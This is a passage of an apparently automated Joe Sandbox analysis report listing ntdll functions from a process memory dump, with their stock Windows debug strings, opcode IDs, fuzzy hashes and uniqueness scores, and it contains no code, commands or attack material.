                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 35824460
                                                                                                                                • ExecuteOptions, xrefs: 358244AB
                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 35824592
                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3582454D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                • API String ID: 0-484625025
                                                                                                                                • Opcode ID: fdda1084fc04480f58c791ef21db2b0d2a7c5dd2deb493a098188959339f4b4a
                                                                                                                                • Instruction ID: 2234a7b571b83d6b9e17667577db919d7163da3799757516241544d39bbe2941
                                                                                                                                • Opcode Fuzzy Hash: fdda1084fc04480f58c791ef21db2b0d2a7c5dd2deb493a098188959339f4b4a
                                                                                                                                • Instruction Fuzzy Hash: 8D51F675A043997AEB14DE95EC89FE977B9FF08344F4004E9D505AF180EB709E468FA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • SsHd, xrefs: 357CA304
                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 358177E2
                                                                                                                                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 358178F3
                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 358177DD, 35817802
                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35817807
                                                                                                                                • Actx , xrefs: 35817819, 35817880
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                • API String ID: 0-1988757188
                                                                                                                                • Opcode ID: 826f35724c0f1d4cb270904f1ce59a3d4649e606e158c56d90f434abda90b583
                                                                                                                                • Instruction ID: 70613e7d305d79310fa62d82f3a26587a5cf4a7c9259d7434eb6245ad7707fd7
                                                                                                                                • Opcode Fuzzy Hash: 826f35724c0f1d4cb270904f1ce59a3d4649e606e158c56d90f434abda90b583
                                                                                                                                • Instruction Fuzzy Hash: 10E1D3746083018FE715CF68C894B1AB7E2BB85365F504AADEC66CF290DB71DA85CB81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35819153
                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 3581914E, 35819173
                                                                                                                                • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 35819372
                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35819178
                                                                                                                                • GsHd, xrefs: 357CD794
                                                                                                                                • Actx , xrefs: 35819315
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                • API String ID: 3446177414-2196497285
                                                                                                                                • Opcode ID: 8168d3606204886fa76d8ce4e7114d6acb10700d1747f233759f5e3d53f75401
                                                                                                                                • Instruction ID: 5468cf5ffd7ed0bf8ddd91044573d3a1e402cd6e68d33a015df4bedd23e923a1
                                                                                                                                • Opcode Fuzzy Hash: 8168d3606204886fa76d8ce4e7114d6acb10700d1747f233759f5e3d53f75401
                                                                                                                                • Instruction Fuzzy Hash: 49E1C2746083819FE710CF14C884B4BB7F6BF88754F414AADE8968F281D771E985CB92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35809885
                                                                                                                                • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35809843
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 35809854, 35809895
                                                                                                                                • LdrpLoadShimEngine, xrefs: 3580984A, 3580988B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 3446177414-3589223738
                                                                                                                                • Opcode ID: 389c7915d23694ff644920265c4a96d8606fe051e99e6b625cba50a4eeff37e8
                                                                                                                                • Instruction ID: c562f61646de2927a890841415845a79969cb9f5dcec76b4ff83edea4bd91610
                                                                                                                                • Opcode Fuzzy Hash: 389c7915d23694ff644920265c4a96d8606fe051e99e6b625cba50a4eeff37e8
                                                                                                                                • Instruction Fuzzy Hash: 2C51EF36B203589FDB14DBA8DC59FADB7B2BB44304F050265E811AF295DF70AC42CB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3585EDE3
                                                                                                                                • Entry Heap Size , xrefs: 3585EDED
                                                                                                                                • HEAP: , xrefs: 3585ECDD
                                                                                                                                • ---------------------------------------, xrefs: 3585EDF9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                • API String ID: 3446177414-1102453626
                                                                                                                                • Opcode ID: 07086bb531cc49054e2d129dfa0993ac0280b0e43d47bb5b9ed05add5cd22143
                                                                                                                                • Instruction ID: 73cb9655979e8c066b0172136234c4173326e61df0440fe79a821140805731c0
                                                                                                                                • Opcode Fuzzy Hash: 07086bb531cc49054e2d129dfa0993ac0280b0e43d47bb5b9ed05add5cd22143
                                                                                                                                • Instruction Fuzzy Hash: 1241C439A10215DFCB05CF18D844A26BBF6FF4536472589E9D448AB321DB31FC42CB84
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: $$@
                                                                                                                                • API String ID: 3446177414-1194432280
                                                                                                                                • Opcode ID: c7f9c1f2dd8ca244700d52d252e98434bd3fa797cf310ff09be8bfc9cfad28b9
                                                                                                                                • Instruction ID: 3946de387bc30a2cec72e51fc2b41e3f79558d0872a21c483a7b50759c2cb091
                                                                                                                                • Opcode Fuzzy Hash: c7f9c1f2dd8ca244700d52d252e98434bd3fa797cf310ff09be8bfc9cfad28b9
                                                                                                                                • Instruction Fuzzy Hash: 87811BB1D042699BDB21CF54CC45BDEB7B8AF48750F0041EAE91ABB250E7709E85CFA4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 35823439
                                                                                                                                • LdrpFindDllActivationContext, xrefs: 35823440, 3582346C
                                                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 3582344A, 35823476
                                                                                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 35823466
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                • API String ID: 3446177414-3779518884
                                                                                                                                • Opcode ID: be013405e54ef2249e28332eedfce07533eba64381521bc9671f1ade49575aca
                                                                                                                                • Instruction ID: f4ea2c67ca576901b595aeb400c151d27ddba6a43d6b5d5c9eec8b9303a8496c
                                                                                                                                • Opcode Fuzzy Hash: be013405e54ef2249e28332eedfce07533eba64381521bc9671f1ade49575aca
                                                                                                                                • Instruction Fuzzy Hash: AA31F5B6E04351AFFB12DF188848F69B6A7BB41394F428166D9057F570EBA0ADC0C6D1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: ^z5
                                                                                                                                • API String ID: 3446177414-641138426
                                                                                                                                • Opcode ID: 6fc7a905a7d6cb1442924fce6df8dd0800421c8ef6acc3165aee3d2a8e4dbdff
                                                                                                                                • Instruction ID: 57cab80d763401c96e431106b8469adcc24dabaf5666df7823ad64bf005adc5c
                                                                                                                                • Opcode Fuzzy Hash: 6fc7a905a7d6cb1442924fce6df8dd0800421c8ef6acc3165aee3d2a8e4dbdff
                                                                                                                                • Instruction Fuzzy Hash: 4F416DBAA14201DFDB15CF29C8849557BF6FF89750B10856AEC098B360DB71E891CBA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%